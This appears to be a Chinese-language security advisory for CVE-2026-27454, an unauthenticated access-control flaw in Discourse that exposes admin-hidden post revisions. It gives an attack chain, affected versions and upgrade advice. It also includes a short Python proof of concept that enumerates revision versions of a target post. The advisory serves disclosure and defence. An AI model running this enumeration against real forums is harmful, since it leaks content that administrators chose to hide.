CVE-2026-27454 CVSS 5.3 中危

CVE-2026-27454 Discourse 越权访问漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27454

漏洞类型

越权访问 (IDOR)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Discourse

漏洞概述

Discourse是一个开源讨论平台。在特定版本之前，系统存在一处权限绕过漏洞。攻击者可以通过构造特定的请求`/posts/:id.json?version=X`，绕过授权检查直接读取被管理员隐藏的帖子历史修订版本。该漏洞源于`display_post`方法在调用`post.revert_to`时未验证用户是否有权查看编辑历史，导致敏感信息泄露。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）。在受影响的Discourse版本中，`display_post`方法处理包含`version`参数的请求时，直接调用`post.revert_to`恢复指定版本的修订，而未调用`guardian.ensure_can_see!`进行权限校验。攻击者无需认证即可利用此漏洞，通过遍历递增的版本号（如version=1, 2...），枚举出帖子的历史修订记录。即便管理员隐藏了某些包含敏感信息的修订版，攻击者依然能够通过接口直接获取这些隐藏内容的原文。修复方案是在恢复修订前增加权限校验，确保只有具备相应权限的用户才能访问特定修订版本。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别目标Discourse论坛并获取感兴趣的帖子ID（Post ID）。

STEP 2

步骤2：枚举攻击

攻击者向`/posts/:id.json?version=X`端点发送大量请求，其中X为递增的整数，用于遍历帖子的历史版本。

STEP 3

步骤3：权限绕过

由于后端未在`display_post`方法中验证用户是否有权查看特定修订版本，服务器直接返回了该版本的内容。

STEP 4

步骤4：信息泄露

攻击者成功获取被管理员隐藏或删除的帖子修订内容，导致敏感信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL vulnerable to IDOR
target_url = "http://target-domain.com/posts/{POST_ID}.json?version={VERSION}"

# Target post ID to enumerate
post_id = 12345

# Iterate through potential revision versions
# Exploit does not require authentication based on PR:N
print(f"Starting enumeration for post ID: {post_id}")

for version in range(1, 50):
    url = target_url.format(POST_ID=post_id, VERSION=version)
    try:
        response = requests.get(url)
        
        if response.status_code == 200:
            data = response.json()
            # Extract raw content from the response
            raw_content = data.get('post', {}).get('raw', '')
            print(f"[+] Version {version} found: {raw_content[:50]}...")
    except Exception as e:
        print(f"Error occurred: {e}")

影响范围

Discourse < 2026.3.0-latest.1

Discourse < 2026.2.1

Discourse < 2026.1.2

防御指南

临时缓解措施

目前无已知的临时缓解措施，建议立即升级至修复版本以封堵漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表